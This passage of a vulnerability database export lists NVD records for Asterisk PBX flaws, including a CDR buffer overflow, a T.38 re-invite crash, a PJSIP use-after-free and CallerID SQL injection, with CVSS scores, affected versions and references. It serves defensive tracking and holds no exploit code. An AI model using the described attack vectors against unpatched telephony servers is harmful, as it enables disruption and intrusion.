              "criteria": "cpe:2.3:a:digium:asterisk:14.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "89036D04-EA04-4041-9694-6768478D35F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B19070D3-9F03-43C7-9F31-9A54BD5F2441",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E39BAA74-50A8-4087-8FF8-7C5922121319",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D29C253-B403-4B00-A626-3E3A920DC018",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E9D8FA2-21EA-4384-8001-118DA7C959F0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8C30F0A0-EE30-496A-ACF0-A9B1BCA46D73",
              "versionEndIncluding": "13.13-cert2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Remote code execution can occur in Asterisk Open Source 13.x before 13.14.1 and 14.x before 14.3.1 and Certified Asterisk 13.13 before 13.13-cert3 because of a buffer overflow in a CDR user field, related to X-ClientCode in chan_sip, the CDR dialplan function, and the AMI Monitor action."
    },
    {
      "lang": "es",
      "value": "La ejecuci\u00f3n remota de c\u00f3digo puede ocurrir en Asterisk Open Source 13.x en versiones anteriores a 13.14.1 y 14.x en versiones anteriores a 14.3.1 y Asterisk certificado 13.13 en versiones anteriores a 13.13-cert3 debido a un desbordamiento de b\u00fafer en un campo de usuario de CDR, relacionado con X-ClientCode en chan_sip , La funci\u00f3n de dialplan CDR y la acci\u00f3n Monitor AMI."
    }
  ],
  "id": "CVE-2017-7617",
  "lastModified": "2024-11-21T03:32:17.860",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-04-10T14:59:00.327",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/97377"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/859910"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/97377"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/859910"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2022-08-30 07:15

Modified

2024-11-21 06:34

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.

References

URL	Tags
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2021-006.html	Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Mailing List, Third Party Advisory
cve@mitre.org	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2021-006.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory

Impacted products

Vendor	Product	Version
asterisk	certified_asterisk	16.8.0
asterisk	certified_asterisk	16.8.0
asterisk	certified_asterisk	16.8.0
asterisk	certified_asterisk	16.8.0
asterisk	certified_asterisk	16.8.0
asterisk	certified_asterisk	16.8.0
asterisk	certified_asterisk	16.8.0
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
debian	debian_linux	9.0
debian	debian_linux	10.0
debian	debian_linux	11.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "335EF1B5-AD89-48E2-AB2C-BF376BC36F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "E64BCD44-2298-4710-9CC3-DF82E6A8DF94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "A35C117A-6EFB-42EB-AD2A-EA7866606927",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "40003CBE-792F-4875-9E60-6F1CE0BBAA8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "46A7AA7B-13F2-496A-99ED-1CC13234E8CB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "147663CB-B48D-4D89-96BF-F92FF96F347F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "27DBBC83-930A-4ECE-8C1E-47481D881B0D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D5A9E8-239F-492C-95AD-7CF2AB964D87",
              "versionEndExcluding": "16.16.2",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9CA36883-D695-47A1-8CA7-2F128BFA194D",
              "versionEndExcluding": "17.9.3",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DEE180D-A041-42AB-AE5E-DDBD9CF0AACF",
              "versionEndExcluding": "18.2.2",
              "versionStartIncluding": "18.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
    },
    {
      "lang": "es",
      "value": "La funci\u00f3n res_pjsip_t38 en Sangoma Asterisk versiones 16.x anteriores a 16.16.2, 17.x anteriores a 17.9.3, y 18.x anteriores a 18.2.2, y Certified Asterisk anteriores a 16.8-cert7, permite a un atacante desencadenar un fallo mediante el env\u00edo de una l\u00ednea m=image y un puerto cero en una respuesta a una Re invitaci\u00f3n T.38 iniciada por Asterisk. Se trata de una reaparici\u00f3n de los s\u00edntomas de la CVE-2019-15297 pero no exactamente por el mismo motivo. El fallo es producido porque se presenta una operaci\u00f3n de append relativa a la topolog\u00eda activa, pero deber\u00eda ser en cambio una operaci\u00f3n de replace"
    }
  ],
  "id": "CVE-2021-46837",
  "lastModified": "2024-11-21T06:34:47.440",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-08-30T07:15:07.417",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-24 15:59

Modified

2024-11-21 02:19

Severity ?

Summary

Use-after-free vulnerability in the PJSIP channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1, when using the res_pjsip_refer module, allows remote attackers to cause a denial of service (crash) via an in-dialog INVITE with Replaces message, which triggers the channel to be hung up.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-016.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-016.html	Vendor Advisory

Impacted products

	Vendor	Product	Version
	digium	asterisk	*
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F21F0B73-A30F-4673-B3A8-D9F456FFCEF2",
              "versionEndExcluding": "12.7.1",
              "versionStartIncluding": "12.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0C83CD93-7CBA-4FF0-B29E-A509F4A3D5E2",
              "versionEndExcluding": "13.0.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Use-after-free vulnerability in the PJSIP channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1, when using the res_pjsip_refer module, allows remote attackers to cause a denial of service (crash) via an in-dialog INVITE with Replaces message, which triggers the channel to be hung up."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de uso despu\u00e9s de liberaci\u00f3n en el controlador de canales PJSIP en Asterisk Open Source 12.x anterior a 12.7.1 y 13.x anterior a 13.0.1, cuando utiliza el m\u00f3dulo res_pjsip_refer, permite a atacantes remotosw causar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00e9s de un in-dialog INVITE con mensaje Replaces, lo que provoca el cuelgue del canal."
    }
  ],
  "id": "CVE-2014-8416",
  "lastModified": "2024-11-21T02:19:02.560",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-24T15:59:08.343",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-016.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-016.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2003-09-22 04:00

Modified

2024-11-20 23:45

Severity ?

Summary

SQL injection vulnerability in the Call Detail Record (CDR) logging functionality for Asterisk allows remote attackers to execute arbitrary SQL via a CallerID string.

References

▼	URL	Tags
	cve@mitre.org	http://www.atstake.com/research/advisories/2003/a091103-1.txt	Exploit, Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://www.atstake.com/research/advisories/2003/a091103-1.txt	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	0.1.7
digium	asterisk	0.1.8
digium	asterisk	0.1.9
digium	asterisk	0.1.9.1
digium	asterisk	0.2
digium	asterisk	0.3
digium	asterisk	0.4

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8C08E661-23D9-437F-844F-6BE8183CF3CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D030C12-C2C6-4714-B776-2EF7ECF1A591",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "CE5A8210-2E7C-465C-9751-CB362AADC224",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "82621C2B-B5F0-4E70-A619-0213005DADB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9750B74B-F766-4869-880B-4E5E41D90533",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "33DCA1D9-0D47-4F0A-A78F-F85FADE0C9B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "ACC453F5-C46A-45E9-B7DE-3C5BF752F305",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SQL injection vulnerability in the Call Detail Record (CDR) logging functionality for Asterisk allows remote attackers to execute arbitrary SQL via a CallerID string."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de inyecci\u00f3n de SQL en la funcionalidad de registro Call Detail Record (CDR) de Asterisk permite a atacantes remotos ejecutra SQL arbitrario mediante una cadena CallerID."
    }
  ],
  "id": "CVE-2003-0779",
  "lastModified": "2024-11-20T23:45:30.373",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2003-09-22T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.atstake.com/research/advisories/2003/a091103-1.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.atstake.com/research/advisories/2003/a091103-1.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2023-12-14 20:15

Modified

2024-11-21 08:11

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
8.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Summary

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.

References

URL	Tags
security-advisories@github.com	https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa	Patch
security-advisories@github.com	https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh	Vendor Advisory
security-advisories@github.com	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	21.0.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AD913C8-79A0-4FE9-9BBD-52BD3260AB2F",
              "versionEndIncluding": "18.20.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DA2E162A-E994-4F25-AE13-D7C889394AC4",
              "versionEndIncluding": "20.5.0",
              "versionStartIncluding": "19.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
